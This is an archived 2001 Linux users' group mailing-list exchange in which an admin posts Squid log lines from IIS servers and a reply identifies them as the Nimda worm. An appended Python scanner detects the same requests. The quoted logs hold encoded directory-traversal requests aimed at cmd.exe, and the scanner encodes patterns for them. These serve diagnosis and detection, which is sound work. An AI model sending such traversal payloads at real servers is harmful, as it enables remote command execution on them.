This is the Nimda worm.
Check:

http://www.cert.org/advisories/CA-2001-26.html

=>Date: Wed, 19 Sep 2001 10:35:56 +0800 (PHT)
=>From: Arvin V. Carlos <[EMAIL PROTECTED]>
=>To: [EMAIL PROTECTED]
=>Cc: Plug Mailing List <[EMAIL PROTECTED]>
=>Subject: WinNT Server Access Problem
=>
=>
=>We have two NT 4.0 running IIS. Suddenly our squid went down because of a
=>disk space problem. We checked our log files, and they eat our disk space
=>because our NT machines try to resolve this all the time:
=>
=>255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.455      1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.487      1 208.142.136.115 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.496      1 208.142.136.115 TCP_MISS/503 1168 GET http://www/d/winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.505      2 208.142.136.115 TCP_MISS/503 1200 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.514      2 208.142.136.115 TCP_MISS/503 1242 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.530      1 208.142.136.115 TCP_MISS/503 1242 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.539      2 208.142.136.115 TCP_MISS/503 1299 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.548      2 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.557      1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
=>
=>Can anyone explain this? Is this a virus? Please HELP!!!
=>
=>

-- 
Cheers,

Paul P. Pongco
Mosaic Communications Inc.




Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
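
Added example, not part of the original messages: a small Python scanner that finds requests like the ones quoted above in a Squid native-format access log and counts them per client, so the probing hosts can be identified. The sample lines are constructed (modelled on the quoted entries, with documentation-range client addresses), and the function names and reason labels are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Invalid (overlong) UTF-8 pairs seen in the quoted log, mapped to the ASCII
# separator a lenient decoder resolves them to: 0xC0 0x2F is '/', 0xC1 0x1C is a backslash.
OVERLONG = {"%c0%2f": "/", "%c1%1c": "\\"}
TRAVERSAL = re.compile(r"\.\.[/\\]")

def normalize(path, max_rounds=3):
    """Lowercase, map overlong pairs, then percent-decode repeatedly so
    double encoding (%255c, then %5c, then a backslash) is exposed."""
    path = path.lower()
    for seq, ch in OVERLONG.items():
        path = path.replace(seq, ch)
    for _ in range(max_rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path

def classify(url):
    """Return a reason label for a request that targets cmd.exe, else None."""
    raw = urlsplit(url).path.lower()
    plain = normalize(raw)
    if not plain.endswith("cmd.exe"):
        return None
    if TRAVERSAL.search(plain):
        return "encoded-traversal" if plain != raw else "traversal"
    return "direct-cmd"

def scan(lines):
    """Count flagged requests per (client, reason); field 3 is the client, field 7 the URL."""
    hits = Counter()
    for line in lines:
        f = line.split()
        if len(f) >= 7 and (reason := classify(f[6])):
            hits[(f[2], reason)] += 1
    return hits

# Constructed sample input (not taken from a real log).
SAMPLE = [
    "1000866350.455 1 192.0.2.10 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -",
    "1000866350.487 1 192.0.2.10 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -",
    "1000866350.505 2 192.0.2.10 TCP_MISS/503 1200 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - DIRECT/www -",
    "1000866351.000 5 192.0.2.20 TCP_MISS/200 4096 GET http://www/index.html - DIRECT/www text/html",
]

if __name__ == "__main__":
    for (client, reason), n in sorted(scan(SAMPLE).items()):
        print(client, reason, n)
```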